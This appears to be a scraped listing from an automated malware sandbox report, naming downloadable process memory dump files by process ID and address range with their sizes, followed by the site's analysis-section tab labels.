Download
memory/2508-186-0x0000000004660000-0x0000000004C88000-memory.dmp

Filesize
6.2MB

Download
memory/2508-181-0x0000000003FF0000-0x0000000004026000-memory.dmp

Filesize
216KB

Download
memory/2816-142-0x0000000000000000-mapping.dmp

Download
memory/3092-191-0x00007FFA81510000-0x00007FFA81705000-memory.dmp

Filesize
2.0MB

Download
memory/3092-179-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

Filesize
10.8MB

Download
memory/3092-180-0x00007FFA81510000-0x00007FFA81705000-memory.dmp

Filesize
2.0MB

Download
memory/3092-182-0x00007FFA80280000-0x00007FFA8033E000-memory.dmp

Filesize
760KB

Download
memory/3092-190-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

Filesize
10.8MB

Download
memory/3092-192-0x00007FFA80280000-0x00007FFA8033E000-memory.dmp

Filesize
760KB

Download
memory/3112-149-0x0000000000000000-mapping.dmp

Download
memory/3592-169-0x0000000000000000-mapping.dmp

Download
memory/3616-150-0x0000000000000000-mapping.dmp

Download
memory/3708-151-0x0000000000000000-mapping.dmp

Download
memory/3716-166-0x0000000000000000-mapping.dmp

Download
memory/3768-193-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/3768-183-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/3768-187-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/3768-185-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/3768-195-0x00007FFA81510000-0x00007FFA81705000-memory.dmp

Filesize
2.0MB

Download
memory/3768-189-0x00007FFA80280000-0x00007FFA8033E000-memory.dmp

Filesize
760KB

Download
memory/3768-184-0x00000001400033F4-mapping.dmp

Download
memory/3768-188-0x00007FFA81510000-0x00007FFA81705000-memory.dmp

Filesize
2.0MB

Download
memory/4016-147-0x0000000000000000-mapping.dmp

Download
memory/4032-143-0x0000000000000000-mapping.dmp

Download
memory/4116-159-0x0000000000000000-mapping.dmp

Download
memory/4220-157-0x0000000000000000-mapping.dmp

Download
memory/4248-140-0x0000000000000000-mapping.dmp

Download
memory/4292-156-0x0000000000000000-mapping.dmp

Download
memory/4792-170-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4792-174-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4792-172-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4792-171-0x0000000140001844-mapping.dmp

Download
memory/4792-173-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4808-153-0x0000000000000000-mapping.dmp

Download
memory/4820-164-0x0000000000000000-mapping.dmp

Download
memory/4896-161-0x0000000000000000-mapping.dmp

Download
memory/4940-167-0x0000000000000000-mapping.dmp

Download
memory/4976-136-0x0000000000000000-mapping.dmp

Download
memory/4976-138-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

Filesize
10.8MB

Download
memory/4976-137-0x0000021F42470000-0x0000021F42492000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads